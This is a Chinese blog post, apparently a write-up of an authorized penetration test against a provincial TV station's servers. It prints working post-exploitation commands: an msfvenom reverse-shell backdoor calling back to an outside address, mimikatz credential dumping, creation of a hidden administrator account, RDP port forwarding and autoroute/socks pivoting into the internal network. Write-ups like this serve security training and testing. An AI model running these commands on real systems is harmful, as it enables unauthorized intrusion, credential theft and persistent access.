年前的一次授权渗透测试

释放双眼,带上耳机,听听看~!

00×01 信息

目标:某省电视台
环境:外网
目标数量:2
当时请假了,于是没赶上,(阵容强大,内容可能会引起不适,请关闭页面)部门同事们也是No.1,秒shell了一个。


Jsp马儿,administrator权限
机器:

权限:

端口开放:

Emmmmmmm….
我也看到有445了…但打不动
进程:

内网开放3389,内网装有亚信

00×02 Msf利用

使用msfvenom生成后门,其中x.x.x.x为防火墙的出口地址。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=x.x.x.x lport=9999 -f exe > x64reservershell.exe
。。。。。。。。。
抓取密码,在meterpreter中,可以使用load mimikatz加载猕猴桃,但此次没有抓到密码,百度一顿原来mimikatz抓不到windows2012的密码。
meterpreter>load mimikatz
meterpreter>wdigest
……啥也没抓到
由于目标机器没有杀软,直接添加用户并加入administrators组
meterpreter>shell
c:\windows\temp1>net user username password /add
c:\windows\temp1>net user localgroup administrators username /add
c:\windows\temp1>exit
meterpreter>
将远程桌面端口转发至本地,供其他小伙伴进内网
meterpreter>portfwd add -l 6666 -p 3389 -r 127.0.0.1 #-l为本地端口;-p为目标服务器端口;-r为目标服务器,这里写的是127.0.0.1,即为将受控服务器的远程桌面端口转发到kali的6666端口
meterpreter>portfwd add -l 9999 -p 8000 -r 192.168.2.4 #将192.168.2.4的8000端口转发到本地的9999端口

可以使用run autoroute添加路由,或者使用socks4a代理,之后可以内网漫游。
run autoroute –h #查看帮助run autoroute -s 192.168.159.0/24 #添加到目标环境网络
run autoroute –p #查看添加的路由

msf> use auxiliary/server/socks4a
msf > set srvhost 127.0.0.1
msf > set srvport 1080
msf > run

00×03 转变策略

进服务器后,对当前c段,进行分析
查到mq apache控制台


00×04 内网碰撞



声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。

给TA打赏
共{{data.count}}人
人已打赏
Web安全渗透测试

内网技巧

2019-1-22 11:15:34

Web安全渗透测试

一次xss到rce

2019-3-18 11:28:37

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
今日签到
有新私信 私信列表
搜索